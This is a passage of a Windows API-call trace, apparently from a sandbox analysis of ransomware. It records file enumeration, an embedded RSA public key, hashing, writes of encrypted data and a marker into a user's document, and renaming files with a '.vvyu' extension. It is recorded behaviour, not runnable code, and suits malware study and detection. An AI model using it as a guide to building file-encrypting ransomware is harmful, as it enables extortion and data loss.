hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0197.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0197.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0197.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0197.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0197.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea6e0 | out: hHeap=0x2c0000) returned 1 [0197.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0197.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0197.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0197.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0197.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0197.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.271] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x30bc, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x30bc, lpOverlapped=0x0) returned 1 [0197.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0197.272] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x30c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.272] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0197.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0197.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0197.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.274] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0197.276] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.276] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.276] CloseHandle (hObject=0x584) returned 1 [0197.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29add10 [0197.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x2af3f88 [0197.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29add10 | out: hHeap=0x2c0000) returned 1 [0197.278] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\BZhLiohmIvg2H0_PVVuu.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ysw9udfa\\bzhliohmivg2h0_pvvuu.pps"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\BZhLiohmIvg2H0_PVVuu.pps.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ysw9udfa\\bzhliohmivg2h0_pvvuu.pps.vvyu")) returned 1 [0197.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.280] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0197.283] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe14680e0, ftCreationTime.dwHighDateTime=0x1d8a515, ftLastAccessTime.dwLowDateTime=0xac5b5b0, ftLastAccessTime.dwHighDateTime=0x1d8a522, ftLastWriteTime.dwLowDateTime=0xac5b5b0, ftLastWriteTime.dwHighDateTime=0x1d8a522, nFileSizeHigh=0x0, nFileSizeLow=0x14331, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="io6KkQYuC.xlsx", cAlternateFileName="IO6KKQ~1.XLS")) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0197.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.283] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\io6KkQYuC.xlsx") returned=".xlsx" [0197.283] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\io6KkQYuC.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ysw9udfa\\io6kkqyuc.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0197.285] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=82737) returned 1 [0197.285] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0197.288] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1430b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.288] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.290] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.290] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x14331, lpOverlapped=0x0) returned 1 [0197.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0197.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.291] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b970) returned 1 [0197.292] CryptCreateHash (in: hProv=0x31b970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0197.292] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.293] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0197.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0197.293] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0197.293] GetLastError () returned 0x0 [0197.293] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0197.293] CryptReleaseContext (hProv=0x31b970, dwFlags=0x0) returned 1 [0197.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.293] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0197.293] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0197.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.293] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0197.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14330) returned 0x2af5168 [0197.294] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0197.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0197.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0197.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea6e0 [0197.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6728 [0197.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea728 [0197.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6740 [0197.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6770 [0197.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67d0 [0197.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6788 [0197.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0197.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0197.295] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0197.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0197.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0197.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67d0 [0197.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0197.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6788 [0197.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0197.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6770 [0197.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0197.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0197.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0197.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0197.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0197.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0197.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0197.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0197.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0197.298] GetCurrentThreadId () returned 0x5d8 [0197.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0197.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2780 [0197.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0197.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0197.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0197.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.299] GetCurrentThreadId () returned 0x5d8 [0197.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0197.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0197.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0197.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0197.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67d0 [0197.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0197.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0197.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0197.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6770 [0197.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0197.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0197.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0197.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0197.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6788 [0197.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0197.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0197.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0197.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6758 [0197.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0197.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67e8 [0197.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0197.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67b8 [0197.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67a0 [0197.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6800 [0197.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67a0 [0197.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0197.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0197.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0197.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6770 [0197.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 